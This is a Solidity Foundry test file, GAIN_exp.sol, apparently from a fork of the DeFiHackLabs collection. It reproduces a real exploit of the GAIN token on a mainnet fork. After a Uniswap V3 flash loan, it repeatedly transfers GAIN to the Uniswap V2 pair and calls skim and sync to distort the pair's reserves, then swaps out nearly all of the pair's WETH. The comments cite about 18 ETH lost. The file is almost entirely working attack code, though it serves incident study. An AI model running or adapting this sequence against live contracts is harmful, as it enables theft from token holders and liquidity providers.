forked from SunWeb3Sec/DeFiHackLabs
-
Notifications
You must be signed in to change notification settings - Fork 0
/
GAIN_exp.sol
73 lines (64 loc) · 2.83 KB
/
GAIN_exp.sol
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @KeyInfo - Total Lost : ~18ETH
// Attacker : https://etherscan.io/address/0x0000000f95c09138dfea7d9bcf3478fc2e13dcab
// Attack Contract : https://etherscan.io/address/0x9a4b9fd32054bfe2099f2a0db24932a4d5f38d0f
// Attack Tx : https://etherscan.io/tx/0x7acc896b8d82874c67127ff3359d7437a15fdb4229ed83da00da1f4d8370764e
// @Analysis
// Post-mortem : https://x.com/0xNickLFranklin/status/1760559768241160679
// Twitter Guy : https://twitter.com/
// Hacking God : https://www.google.com/
contract ContractTest is Test {
IWETH WETH = IWETH(payable(address(0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2)));
IERC20 GAIN = IERC20(0xdE59b88abEFA5e6C8aA6D742EeE0f887Dab136ac);
Uni_Pair_V3 univ3USDT = Uni_Pair_V3(0xc7bBeC68d12a0d1830360F8Ec58fA599bA1b0e9b);
Uni_Pair_V2 univ2GAIN = Uni_Pair_V2(0x31d80EA33271891986D873B397d849A92EF49255);
address[] private addrPath = new address[](2);
uint256 totalBorrowed = 0.1 ether;
function setUp() public {
vm.createSelectFork("mainnet", 19_277_620 - 1);
vm.label(address(WETH), "WETH");
vm.label(address(univ3USDT), "Uniswap V3: USDT");
vm.label(address(univ2GAIN), "Uniswap V2: GAIN");
approveAll();
}
function testExploit() external {
address[] memory tokens = new address[](1);
tokens[0] = address(WETH);
uint256[] memory amounts = new uint256[](1);
amounts[0] = totalBorrowed;
bytes memory userData = "";
console.log("Before Start: %d ETH", WETH.balanceOf(address(this)));
univ3USDT.flash(address(this), totalBorrowed, 0, userData);
uint256 intRes = WETH.balanceOf(address(this)) / 1 ether;
uint256 decRes = WETH.balanceOf(address(this)) - intRes * 1e18;
console.log("Attack Exploit: %s.%s ETH", intRes, decRes);
}
function uniswapV3FlashCallback(
uint256 fee0,
uint256 fee1,
bytes memory data
) external {
WETH.transfer(address(univ2GAIN), totalBorrowed);
exploitGAIN();
WETH.transfer(address(univ3USDT), totalBorrowed + fee0);
}
function exploitGAIN() internal {
uint256 amount = 100_000;
univ2GAIN.swap(0, amount, address(this), "");
GAIN.transfer(address(univ2GAIN), 100);
univ2GAIN.skim(address(this));
univ2GAIN.sync();
GAIN.transfer(address(univ2GAIN), 188);
univ2GAIN.skim(address(this));
univ2GAIN.sync();
GAIN.transfer(address(univ2GAIN), 130_000_000_000_000);
uint leave_dust = WETH.balanceOf(address(univ2GAIN))- WETH.balanceOf(address(univ2GAIN))/100;
univ2GAIN.swap(leave_dust, 0, address(this), "");
}
function approveAll() internal {
WETH.approve(address(this), type(uint256).max);
}
}